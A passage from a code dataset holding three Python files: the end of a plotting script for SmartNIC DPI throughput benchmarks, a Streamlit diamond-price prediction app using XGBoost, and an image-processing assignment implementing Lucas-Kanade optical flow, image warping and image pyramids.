\"CAIDA1024_IPSEC_SHA\", \"CAIDA1024_IPSEC_ACL_SHA\"], \"1KB\")\n }\n return switcher.get(ori_name, \"Invalid trace name %s\" % (ori_name,))\n\ndef get_core(ori_name):\n switcher = {\n **dict.fromkeys([\"0x1\", \"1\"], \"1\"), \n **dict.fromkeys([\"0x3\", \"2\"], \"2\"), \n **dict.fromkeys([\"0x7\", \"3\"], \"3\"), \n **dict.fromkeys([\"0xF\", \"4\"], \"4\"), \n **dict.fromkeys([\"0x1F\", \"5\"], \"5\"),\n **dict.fromkeys([\"0x3F\", \"6\"], \"6\"),\n **dict.fromkeys([\"0x7F\", \"7\"], \"7\"),\n **dict.fromkeys([\"0xFF\", \"8\"], \"8\"),\n **dict.fromkeys([\"0xFFF\", \"12\"], \"12\"),\n **dict.fromkeys([\"0xFFFF\", \"16\"], \"16\")\n }\n return switcher.get(ori_name, \"Invalid core name %s\" % (ori_name,))\n\ndef get_rule(ori_name):\n switcher = {\n **dict.fromkeys([\"1000\", \"1k\"], \"1k\"), \n **dict.fromkeys([\"5000\", \"5k\"], \"5k\"), \n **dict.fromkeys([\"10000\", \"10k\"], \"10k\"), \n **dict.fromkeys([\"20000\", \"20k\"], \"20k\"), \n **dict.fromkeys([\"30000\", \"30k\"], \"30k\"), \n **dict.fromkeys([\"33471\", \"full\"], \"33.5k\")\n }\n return switcher.get(ori_name, \"Invalid rule name %s\" % (ori_name,))\n\nt_val = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list)))))\navg_l_val = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list)))))\ntail_l_val = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list)))))\n\n# we report the median of the 10 runs. \n# type (nic, nb, sb) -> task -> ipsecs -> trace -> core -> median throughput/latency values for 10 runs\nt_val_med = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(float)))))\navg_l_val_med = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(float)))))\ntail_l_val_med = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(float)))))\n\n# first load **all** files to the dict\ndef data_load(f_name):\n with open(f_name, 'r') as f:\n raw_entry = f.readline()\n while raw_entry:\n entry_array = raw_entry.rstrip(\"\\n\").split(\",\")\n # print(entry_array)\n _task = get_task(entry_array[0])\n _ipsec = get_ipsec(entry_array[0])\n _trace = get_trace(entry_array[1])\n _core = get_core(entry_array[2])\n _rule = get_rule(entry_array[3])\n _t = float(entry_array[4])\n _avg_l = float(entry_array[5])\n _tail_l = float(entry_array[6])\n t_val[_task][_ipsec][_trace][_core][_rule].append(float(_t))\n avg_l_val[_task][_ipsec][_trace][_core][_rule].append(float(_avg_l))\n tail_l_val[_task][_ipsec][_trace][_core][_rule].append(float(_tail_l))\n raw_entry = f.readline()\n # currently we only load the data of the first file\n # break \n\n# then process data to get graph drawing data\ndef process_draw_data():\n for _task in all_tasks:\n ipc_degrad = 1\n if _task == \"SmartNIC-DPI\":\n ipc_degrad = 1 - 0.0166\n for _ipsec in all_ipsecs:\n for _trace in all_traces:\n for _core in all_cores:\n for _rule in all_rules:\n try:\n t_val_med[_task][_ipsec][_trace][_core][_rule] = np.median(t_val[_task][_ipsec][_trace][_core][_rule]) * ipc_degrad\n except IndexError:\n t_val_med[_task][_ipsec][_trace][_core][_rule] = 0\n try:\n avg_l_val_med[_task][_ipsec][_trace][_core][_rule] = np.median(avg_l_val[_task][_ipsec][_trace][_core][_rule]) / ipc_degrad\n except IndexError:\n avg_l_val_med[_task][_ipsec][_trace][_core][_rule] = 0\n try:\n tail_l_val_med[_task][_ipsec][_trace][_core][_rule] = np.median(tail_l_val[_task][_ipsec][_trace][_core][_rule]) / ipc_degrad\n except IndexError:\n tail_l_val_med[_task][_ipsec][_trace][_core][_rule] = 0\n \ndef get_t_draw_data_vary_rule(_task, _ipsec, _trace, _core):\n data_vec = list()\n for _rule in all_rules:\n data_vec.append(t_val_med[_task][_ipsec][_trace][_core][_rule])\n return data_vec\n\ndef draw_t_bar_for_rule(_ipsec, _trace, _core):\n N = len(all_rules)\n ind = np.arange(N) * 10 + 10 # the x locations for the groups \n width = 6.0/N # the width of the bars: can also be len(x) sequence\n\n cnt = 0\n all_data_vec = []\n legends = list()\n for _task in all_tasks:\n data_vec = get_t_draw_data_vary_rule(_task, _ipsec, _trace, _core)\n p1, = plt.plot(ind, data_vec, linestyle = linestyles[cnt], marker = markers[cnt], markersize = markersizes[cnt],\n color=colors[cnt], linewidth=3)\n legends.append(p1)\n cnt += 1\n all_data_vec.append(data_vec)\n\n print('nic vs ac: {:.2f}'.format(all_data_vec[2][5]/all_data_vec[0][5]))\n print('nic vs hs: {:.2f}'.format(all_data_vec[2][5]/all_data_vec[1][5]))\n\n plt.legend(legends, all_tasks, frameon=False)\n plt.ylabel('Throughput (Mpps)')\n plt.xticks(ind, all_rules)\n\n # apply offset transform to all x ticklabels.\n for label in plt.axes().xaxis.get_majorticklabels():\n label.set_transform(label.get_transform() + offset)\n plt.axes().grid(which='major', axis='y', linestyle=':')\n plt.axes().set_axisbelow(True)\n\n plt.tight_layout()\n plt.savefig('./figures/ac-hs/throughput/t_bar_%s_%s_%score.pdf' % (_ipsec, _trace, _core))\n plt.clf()\n\n \ndef get_t_draw_data_vary_trace(_task, _ipsec, _core, _rule):\n data_vec = list()\n for _trace in all_traces_pktsize:\n data_vec.append(t_val_med[_task][_ipsec][_trace][_core][_rule])\n return data_vec\n\ndef draw_t_bar_for_trace(_ipsec, _core, _rule):\n N = len(all_traces_pktsize)\n ind = np.arange(N) * 10 + 10 # the x locations for the groups \n width = 6.0/N # the width of the bars: can also be len(x) sequence\n\n cnt = 0\n legends = list()\n for _task in all_tasks:\n data_vec = get_t_draw_data_vary_trace(_task, _ipsec, _core, _rule)\n p1, = plt.plot(ind, data_vec, linestyle = linestyles[cnt], marker = markers[cnt], markersize = markersizes[cnt],\n color=colors[cnt], linewidth=3)\n legends.append(p1)\n cnt += 1\n\n plt.legend(legends, all_tasks, frameon=False)\n plt.ylabel('Throughput (Mpps)')\n plt.xticks(ind, all_traces_pktsize)\n\n # apply offset transform to all x ticklabels.\n for label in plt.axes().xaxis.get_majorticklabels():\n label.set_transform(label.get_transform() + offset)\n plt.axes().grid(which='major', axis='y', linestyle=':')\n plt.axes().set_axisbelow(True)\n\n plt.tight_layout()\n plt.savefig('./figures/ac-hs/throughput/t_bar_%s_%score_%srule.pdf' % (_ipsec, _core, _rule))\n plt.clf()\n\nif __name__ == \"__main__\":\n plt.rc('text', usetex=True)\n font = fm.FontProperties(\n family = 'Gill Sans',\n fname = '/usr/share/fonts/truetype/adf/GilliusADF-Regular.otf')\n\n\n data_load(f'./{data_dir}/nic/ac-hs.res')\n data_load(f'./{data_dir}/nb/ac-hs.res')\n\n process_draw_data()\n draw_t_bar_for_rule(\"no_ipsec\", \"ICTF\", \"1\")\n draw_t_bar_for_trace(\"no_ipsec\", \"1\", \"33.5k\")\n draw_t_bar_for_trace(\"no_ipsec\", \"1\", \"1k\")\n", "repo_name": "YangZhou1997/sgxnic-figuredraw", "sub_path": "plot_ac_hs.py", "file_name": "plot_ac_hs.py", "file_ext": "py", "file_size_in_byte": 10282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.use", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.rcParams.update", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.transforms.ScaledTranslation", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 81, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 82, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 83, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 87, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 88, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.font_manager", "line_number": 212, "usage_type": "name"}]} +{"seq_id": "192793888", "text": "import streamlit as st\r\nimport joblib\r\nimport numpy as np\r\nimport pandas as pd\r\nimport xgboost\r\n\r\n\r\nxgb_model = joblib.load('xgb_model.pkl')\r\n\r\n\r\n\r\nst.title('Diamond Price Prediction')\r\n\r\n\r\nst.write('### Explained of Data')\r\nst.write('**carat** : weight of the diamond (0.2--5.01)')\r\n\r\nst.write('**cut** : quality of the cut (Fair, Good, Very Good, Premium, Ideal)')\r\n\r\nst.write('**color** : diamond colour, from J (worst) to D (best)')\r\n\r\nst.write('**clarity** : a measurement of how clear the diamond is (I1 (worst), SI2, SI1, VS2, VS1, VVS2, VVS1, IF (best))')\r\n\r\nst.write('**x** : length in mm (0--10.74)')\r\n\r\nst.write('**y** : width in mm (0--58.9)')\r\n\r\nst.write('**z** : depth in mm (0--31.8)')\r\n\r\nst.markdown('')\r\nst.markdown('')\r\n\r\nst.markdown('##### Input carat value')\r\ncarat = st.slider('Carat', min_value=0.2, max_value=5.0, step=0.1)\r\n\r\nst.markdown('##### Input Clarity value')\r\noptions_clarity = ['I1', 'SI2', 'SI1', 'VS2', 'VS1', 'VVS2', 'VVS1', 'IF']\r\nclarity = st.selectbox(\r\n 'Clarity',\r\n options_clarity\r\n)\r\n\r\nst.markdown('##### Input Cut value')\r\ncut_options = ['Fair', 'Good', 'Very Good', 'Premium', 'Ideal']\r\ncut = st.selectbox(\r\n 'Cut',\r\n cut_options\r\n)\r\n\r\nst.markdown('##### Input Color value')\r\noptions_color = ['E', 'I', 'J', 'H', 'F', 'G', 'D']\r\ncolor = st.selectbox(\r\n 'Color',\r\n options_color)\r\n\r\nst.markdown('##### Input X value (in mm)')\r\nx = st.slider('X', min_value=0.0, max_value=11.0, step=0.1)\r\n\r\nst.markdown('##### Input Y value (in mm)')\r\ny = st.slider('Y', min_value=0.0, max_value=59.0, step=0.1)\r\n\r\nst.markdown('##### Input Z value (in mm)')\r\nz = st.slider('Z', min_value=0.0, max_value=32.0, step=0.1)\r\n\r\nif st.button(\"Predict\"):\r\n\r\n color_mapping = {'E': 1, 'I': 2, 'J': 3, 'H': 4, 'F': 5, 'G': 6, 'D': 7}\r\n features_color = color_mapping[color]\r\n\r\n clarity_mapping = {'I1': 1, 'SI2': 2, 'SI1': 3, 'VS2': 4, 'VS1': 5, 'VVS2': 6, 'VVS1': 7, 'IF': 8}\r\n features_clarity = clarity_mapping[clarity]\r\n\r\n cut_mapping = {'Fair': 1, 'Good': 2, 'Very Good': 3, 'Premium': 4, 'Ideal': 5}\r\n features_cut = cut_mapping[cut]\r\n\r\n\r\n # Prepare the input data as a feature vector\r\n features = [float(carat), float(features_cut), float(features_color), float(features_clarity), float(x), float(y), float(z)]\r\n input_data = np.array(features).reshape(1, -1)\r\n\r\n # Make the prediction using the loaded model\r\n # prediction = rf_model.predict(input_data)\r\n prediction = xgb_model.predict(input_data)\r\n\r\n # Display the prediction result\r\n st.success(f\"The predicted price is {prediction}\")\r\n", "repo_name": "NicoLe-01/data-mining-streamlit", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "joblib.load", "line_number": 8, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 16, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 18, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 24, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 26, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 28, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 30, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 31, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 36, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 38, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 43, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 45, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 50, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 52, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 56, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 57, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 59, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 62, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 79, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "20783380127", "text": "import math\nimport sys\nfrom typing import List\n\nimport numpy as np\nimport cv2\nfrom numpy.linalg import LinAlgError\n\nfrom scipy import signal\nimport matplotlib.pyplot as plt\n\n\ndef myID() -> np.int:\n \"\"\"\n Return my ID (not the friend's ID I copied from)\n :return: int\n \"\"\"\n return 207616830\n\n\n# ---------------------------------------------------------------------------\n# ------------------------ Lucas Kanade optical flow ------------------------\n# ---------------------------------------------------------------------------\n\n\ndef opticalFlow(im1: np.ndarray, im2: np.ndarray, step_size=10,\n win_size=5) -> (np.ndarray, np.ndarray):\n \"\"\"\n Given two images, returns the Translation from im1 to im2\n :param im1: Image 1\n :param im2: Image 2\n :param step_size: The image sample size\n :param win_size: The optical flow window size (odd number)\n :return: Original points [[x,y]...], [[dU,dV]...] for each points\n \"\"\"\n points = []\n uv = []\n\n # RGB -> GRAY & normalize\n imGray1 = cv2.cvtColor(im1, cv2.COLOR_RGB2GRAY) if len(im1.shape) > 2 else im1\n imGray2 = cv2.cvtColor(im2, cv2.COLOR_RGB2GRAY) if len(im2.shape) > 2 else im2\n\n # kernel to get t: I2 - I1\n kernel_t = np.array([[1., 1.], [1., 1.]]) * .25\n s = int(win_size / 2)\n\n # convolve img with kernel to derivative\n fx = cv2.Sobel(im2, cv2.CV_64F, 1, 0, ksize=3,\n borderType=cv2.BORDER_DEFAULT)\n fy = cv2.Sobel(im2, cv2.CV_64F, 0, 1, ksize=3,\n borderType=cv2.BORDER_DEFAULT)\n ft = signal.convolve2d(imGray2, kernel_t, boundary='symm', mode='same') + signal.convolve2d(imGray1, -kernel_t,\n boundary='symm',\n mode='same')\n # for each point, calculate Ix, Iy, It\n # by moving the kernel over the image\n (rows, cols) = imGray1.shape\n for i in range(s, rows - s, step_size):\n for j in range(s, cols - s, step_size):\n # get the derivative in the kernel location\n Ix = fx[i - s:i + s + 1, j - s:j + s + 1].flatten()\n Iy = fy[i - s:i + s + 1, j - s:j + s + 1].flatten()\n It = ft[i - s:i + s + 1, j - s:j + s + 1].flatten()\n\n Atb = [[-(Ix * It).sum()], [-(Iy * It).sum()]]\n AtA = [[(Ix * Ix).sum(), (Ix * Iy).sum()],\n [(Ix * Iy).sum(), (Iy * Iy).sum()]]\n lambdas = np.linalg.eigvals(AtA)\n l1 = np.max(lambdas)\n l2 = np.min(lambdas)\n if l1 >= l2 > 1 and (l1 / l2) < 100:\n nu = np.matmul(np.linalg.pinv(AtA), Atb) # (AtA)^-1 * Atb\n points.append([j, i]) # origin location\n uv.append([nu[0, 0], nu[1, 0]]) # new location\n return np.asarray(points), np.asarray(uv)\n\n\ndef opticalFlowPyrLK(img1: np.ndarray, img2: np.ndarray, k: int,\n stepSize: int, winSize: int) -> np.ndarray:\n \"\"\"\n :param img1: First image\n :param img2: Second image\n :param k: Pyramid depth\n :param stepSize: The image sample size\n :param winSize: The optical flow window size (odd number)\n :return: A 3d array, with a shape of (m, n, 2),\n where the first channel holds U, and the second V.\n Ui = Ui + 2 ∗ Ui−1, Vi = Vi + 2 ∗ Vi−1\n \"\"\"\n pyr1 = gaussianPyr(img1, k) # gauss pyramid for img1\n pyr2 = gaussianPyr(img2, k) # gauss pyramid for img2\n currImg = np.zeros(\n (pyr1[k - 2].shape[0], pyr1[k - 2].shape[1], 2)) # (m,n,2) zero array to put in u,v for each pixel\n lastImg = np.zeros((pyr1[k - 1].shape[0], pyr1[k - 1].shape[1], 2))\n\n points, uv = opticalFlow(pyr1[k - 1], pyr2[k - 1], stepSize, winSize)\n for j in range(len(points)): # change pixels uv by formula\n y, x = points[j]\n u, v = uv[j]\n lastImg[x, y, 0] = u\n lastImg[x, y, 1] = v\n\n for i in range(k - 2, -1, -1): # for each level of pyramids (small -> big)\n points, uv = opticalFlow(pyr1[i], pyr2[i], stepSize, winSize) # uv for i'th img\n for j in range(len(points)): # change pixels uv by formula\n y, x = points[j]\n u, v = uv[j]\n currImg[x, y, 0] = u\n currImg[x, y, 1] = v\n for z in range(lastImg.shape[0]):\n for r in range(lastImg.shape[1]):\n currImg[z * 2, r * 2, 0] += lastImg[z, r, 0] * 2\n currImg[z * 2, r * 2, 1] += lastImg[z, r, 1] * 2\n\n lastImg = currImg.copy()\n if i - 1 >= 0:\n currImg.fill(0)\n currImg.resize((pyr1[i - 1].shape[0], pyr1[i - 1].shape[1], 2))\n\n return currImg\n\n\n# ---------------------------------------------------------------------------\n# ------------------------ Image Alignment & Warping ------------------------\n# ---------------------------------------------------------------------------\n\n\n# ------------------ Help functions ----------------------\n\ndef getWarpMatrix(method, theta, tx, ty) -> np.ndarray:\n \"\"\"\n\n :param method: rigid / trans / rigid_opp\n :param theta: angle (for trans put 0)\n :param tx: move x\n :param ty: move y\n :return: correct warping matrix\n \"\"\"\n if method == \"rigid\":\n return np.array([[np.cos(theta), -np.sin(theta), tx],\n [np.sin(theta), np.cos(theta), ty],\n [0, 0, 1]], dtype=np.float64)\n elif method == \"trans\":\n return np.array([[1, 0, tx],\n [0, 1, ty],\n [0, 0, 1]], dtype=np.float64)\n elif method == \"rigid_opp\":\n return np.array([[np.cos(theta), np.sin(theta), 0],\n [-np.sin(theta), np.cos(theta), 0],\n [0, 0, 1]], dtype=np.float64)\n\n\ndef findTheta(im1: np.ndarray, im2: np.ndarray) -> float:\n \"\"\"\n find angle of rotation between im1 to im2\n :param im1:\n :param im2:\n :return: theta\n \"\"\"\n min_mse = 1000\n theta = 0\n\n # find best angle\n for t in range(360):\n matrix_rigid = getWarpMatrix(\"rigid\", t, 0, 0)\n curr_rigid_img = cv2.warpPerspective(im1, matrix_rigid, im1.shape[::-1]) # warp img\n mse = np.square(np.subtract(im2, curr_rigid_img)).mean() # mse with curr angle\n if mse < min_mse: # if this angle gave better result -> change\n min_mse = mse\n theta = t\n return theta\n\n\n# ------------------ Translation & Rigid by LK ----------------------\n\ndef findTranslationLK(im1: np.ndarray, im2: np.ndarray) -> np.ndarray:\n \"\"\"\n :param im1: image 1 in grayscale format.\n :param im2: image 1 after Translation.\n :return: Translation matrix by LK.\n \"\"\"\n MSE_min = sys.maxsize\n points, uv = opticalFlow(im1, im2) # get uv by LK\n (u1, v1) = uv[0]\n\n # find the best u,v --> minimize the MSE\n for (u, v) in uv:\n T = getWarpMatrix(\"trans\", 0, u, v)\n trans_img = cv2.warpPerspective(im1, T, im1.shape[::-1])\n MSE = np.square(im2 - trans_img).mean()\n if MSE < MSE_min:\n MSE_min = MSE\n u1, v1 = u, v\n\n return getWarpMatrix(\"trans\", 0, u1, v1)\n\n\ndef findRigidLK(im1: np.ndarray, im2: np.ndarray) -> np.ndarray:\n \"\"\"\n :param im1: origin img\n :param im2: rigid img\n :return: rigid matrix from im1 to im2\n \"\"\"\n\n theta = findTheta(im1, im2) # find theta\n matrix_rigid = getWarpMatrix(\"rigid_opp\", theta, 0, 0) # matrix to rotate img back to origin\n rotate_img = cv2.warpPerspective(im2, matrix_rigid, im2.shape[::-1]) # rotate im2 back to im1\n T = findTranslationLK(im1, rotate_img) # find translation matrix\n return getWarpMatrix(\"rigid\", theta, T[0, 2], T[1, 2]) # rigid matrix: translation+rotation\n\n\n# ------------------ Translation & Rigid by correlation ----------------------\n\ndef opticalFlowNCC(im1: np.ndarray, im2: np.ndarray, step_size, win_size):\n h = win_size // 2 # half of win\n uv = np.zeros((im1.shape[0], im1.shape[1], 2)) # for each pixel insert uv\n\n def Max_corr_idx(win: np.ndarray):\n \"\"\"\n win1: img1 curr window (template)\n norm1: norm of win1\n (same for img2)\n\n NCC = (win1-mean(win1) * win2-mean(win2)) / (||win1|| * ||win2||)\n\n :param win:\n :return:\n \"\"\"\n max_corr = -1000\n corr_idx = (0, 0)\n win1 = win.copy().flatten() - win.mean()\n norm1 = np.linalg.norm(win1, 2) # normalize win1\n\n # correlate win1 with img2, and sum the corr in current window\n for i in range(h, im2.shape[0] - h - 1):\n for j in range(h, im2.shape[1] - h - 1):\n win2 = im2[i - h: i + h + 1, j - h: j + h + 1] # get curr window from img2\n win2 = win2.copy().flatten() - win2.mean()\n norm2 = np.linalg.norm(win2, 2) # normalize win2\n norms = norm1 * norm2 # ||win1|| * ||win2||\n corr = 0 if norms == 0 else np.sum(win1 * win2) / norms # correlation sum\n\n # take the window that maximize the corr\n if corr > max_corr:\n max_corr = corr\n corr_idx = (i, j) # top left pixels of curr window\n return corr_idx\n\n # each iteration take window from img2, and send to 'Max_corr_idx()' to find template matching\n for y in range(h, im1.shape[0] - h - 1, step_size):\n for x in range(h, im1.shape[1] - h - 1, step_size):\n template = im1[y - h: y + h + 1, x - h: x + h + 1]\n if cv2.countNonZero(template) == 0:\n continue\n index = Max_corr_idx(template) # index of best 'template matching' in img2\n uv[y - h, x - h] = np.flip(index - np.array([y, x]))\n\n return uv\n\n\ndef findTranslationCorr(im1: np.ndarray, im2: np.ndarray) -> np.ndarray:\n \"\"\"\n take median u,v from 'opticalFlowNCC()'\n :param im1: origin img\n :param im2: translated img\n :return: translation matrix\n \"\"\"\n uvs = opticalFlowNCC(im1, im2, 32, 13) # get uv of all pixels\n u, v = np.ma.median(np.ma.masked_where(\n uvs == np.zeros(2), uvs), axis=(0, 1)).filled(0) # take the median u,v\n return getWarpMatrix(\"trans\", 0, u, v)\n\n\ndef findRigidCorr(im1: np.ndarray, im2: np.ndarray) -> np.ndarray:\n \"\"\"\n :param im1: input image 1 in grayscale format.\n :param im2: image 1 after Rigid.\n :return: Rigid matrix by correlation.\n \"\"\"\n theta = findTheta(im1, im2) # find theta\n matrix_rigid = getWarpMatrix(\"rigid\", theta, 0, 0) # matrix to rotate img back to origin\n revers_img = cv2.warpPerspective(im1, matrix_rigid, im1.shape[::-1])\n T = findTranslationCorr(im2, revers_img) # find translation matrix\n\n return getWarpMatrix(\"rigid\", theta, T[0, 2], T[1, 2]) # rigid matrix: translation+rotation\n\n\n# ------------------ Warping ----------------------\n\ndef warpImages(im1: np.ndarray, im2: np.ndarray, T: np.ndarray) -> np.ndarray:\n \"\"\"\n :param im1: input image 1 in grayscale format.\n :param im2: input image 2 in grayscale format.\n :param T: is a 3x3 matrix such that each pixel in image 2\n is mapped under homogenous coordinates to image 1 (p2=Tp1).\n :return: warp image 2 according to T and display both image1\n and the wrapped version of the image2 in the same figure.\n \"\"\"\n if im2.ndim == 3: # RGB img\n im2 = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)\n img_warp = np.zeros(im2.shape)\n TP = np.linalg.pinv(T)\n for i in range(im2.shape[0]):\n for j in range(im2.shape[1]):\n curr_idx = np.array([i, j, 1]) # curr index in new_img\n idx_orig = TP @ curr_idx # this pixel index after rotation in im2\n x = (idx_orig[0] // idx_orig[2]).astype(int) # back to 2D\n y = (idx_orig[1] // idx_orig[2]).astype(int) # back to 2D\n\n if 0 <= x < im2.shape[0] and 0 <= y < im2.shape[1]: # if index is in img range\n img_warp[i, j] = im2[x, y] # insert pixel to new_img\n\n return img_warp\n\n\n# ---------------------------------------------------------------------------\n# --------------------- Gaussian and Laplacian Pyramids ---------------------\n# ---------------------------------------------------------------------------\ndef blurImage(in_image: np.ndarray, k_size: int, n: int) -> np.ndarray:\n k = cv2.getGaussianKernel(k_size, -1)\n kernel = k * k.T\n return cv2.filter2D(in_image, -1, kernel * n)\n\n\ndef gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\n \"\"\"\n Creates a Gaussian Pyramid\n :param img: Original image\n :param levels: Pyramid depth\n :return: Gaussian pyramid (list of images)\n \"\"\"\n pyramid = [img]\n for i in range(1, levels):\n tmp = blurImage(pyramid[i - 1], 5, 1)\n tmp = tmp[::2, ::2]\n pyramid.append(tmp)\n return pyramid\n\n\ndef expandImg(img: np.ndarray, newShape) -> np.ndarray:\n expand = np.zeros(newShape)\n expand[::2, ::2] = img\n return blurImage(expand, 5, 4)\n\n\ndef laplaceianReduce(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\n \"\"\"\n Creates a Laplacian pyramid\n :param img: Original image\n :param levels: Pyramid depth\n :return: Laplacian Pyramid (list of images)\n \"\"\"\n gauss_pyr = gaussianPyr(img, levels)\n for i in range(levels - 1):\n gauss_pyr[i] = gauss_pyr[i] - expandImg(gauss_pyr[i + 1], gauss_pyr[i].shape)\n return gauss_pyr\n\n\ndef laplaceianExpand(lap_pyr: List[np.ndarray]) -> np.ndarray:\n \"\"\"\n Restores the original image from 